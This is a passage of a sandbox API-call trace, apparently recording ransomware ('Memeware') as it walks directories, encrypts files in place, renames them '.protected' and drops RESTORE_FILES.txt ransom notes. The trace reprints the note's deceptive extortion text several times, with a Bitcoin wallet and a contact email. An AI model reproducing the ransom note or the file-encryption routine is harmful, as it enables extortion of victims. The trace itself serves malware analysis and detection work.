Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\..") returned 85 [0073.225] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.225] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.225] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.225] lstrcmpiW (lpString1="Patch", lpString2="Windows") returned -1 [0073.225] lstrcmpiW (lpString1="Patch", lpString2="Program Files") returned -1 [0073.225] lstrcmpiW (lpString1="Patch", lpString2="Program Files (x86)") returned -1 [0073.225] lstrcmpiW (lpString1="Patch", lpString2="$Recycle.bin") returned 1 [0073.225] lstrcmpiW (lpString1="Patch", lpString2="System Volume Information") returned -1 [0073.225] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned 88 [0073.225] lstrcmpW (lpString1="Patch", lpString2=".") returned 1 [0073.225] lstrcmpW (lpString1="Patch", lpString2="..") returned 1 [0073.225] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*") returned 90 [0073.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0073.226] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.226] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.226] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.226] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.226] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.226] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\.") returned 90 [0073.226] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.226] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.226] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.226] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.226] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.226] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.226] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.226] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\..") returned 91 [0073.226] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.226] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.226] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.226] lstrcmpiW (lpString1="x64", lpString2="Windows") returned 1 [0073.226] lstrcmpiW (lpString1="x64", lpString2="Program Files") returned 1 [0073.226] lstrcmpiW (lpString1="x64", lpString2="Program Files (x86)") returned 1 [0073.226] lstrcmpiW (lpString1="x64", lpString2="$Recycle.bin") returned 1 [0073.226] lstrcmpiW (lpString1="x64", lpString2="System Volume Information") returned 1 [0073.226] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned 92 [0073.226] lstrcmpW (lpString1="x64", lpString2=".") returned 1 [0073.226] lstrcmpW (lpString1="x64", lpString2="..") returned 1 [0073.230] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*") returned 94 [0073.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x447cc0 [0073.230] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.230] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.230] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.230] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.230] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\.") returned 94 [0073.231] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.231] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0073.231] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.231] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.231] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.231] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.231] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\..") returned 95 [0073.231] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.231] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.231] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0073.231] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Windows") returned 1 [0073.231] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Program Files") returned 1 [0073.231] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="Program Files (x86)") returned 1 [0073.231] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="$Recycle.bin") returned 1 [0073.231] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="System Volume Information") returned 1 [0073.231] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.231] StrStrIW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".protected") returned 0x0 [0073.231] lstrcmpW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="RESTORE_FILES.txt") returned 1 [0073.231] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0073.231] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0073.231] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0073.231] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.231] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".txt") returned 0x0 [0073.231] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.231] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".rar") returned 0x0 [0073.231] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu") returned 121 [0073.232] StrStrW (lpFirst="Windows6.1-KB2999226-x64.msu", lpSrch=".zip") returned 0x0 [0073.232] ReadFile (in: hFile=0x14c, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0073.261] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.261] WriteFile (in: hFile=0x14c, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0073.262] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.262] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0073.267] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0073.267] CloseHandle (hObject=0x14c) returned 1 [0073.267] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected") returned 131 [0073.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.protected")) returned 1 [0073.268] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0073.268] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0073.268] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 110 [0073.268] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.268] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.268] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0073.269] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.269] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0073.269] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.269] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0073.269] CloseHandle (hObject=0xd8) returned 1 [0073.270] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0073.270] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0073.270] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RESTORE_FILES.txt") returned 106 [0073.270] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0073.270] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.270] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0073.271] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.271] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0073.271] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.271] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0073.271] CloseHandle (hObject=0xd4) returned 1 [0073.272] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0073.272] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0073.273] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RESTORE_FILES.txt") returned 100 [0073.273] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.273] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.273] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0073.274] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.274] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0073.274] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.274] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0073.274] CloseHandle (hObject=0xb4) returned 1 [0073.274] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0073.274] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0073.275] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RESTORE_FILES.txt") returned 91 [0073.275] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0073.275] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.275] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0073.276] lstrlenA 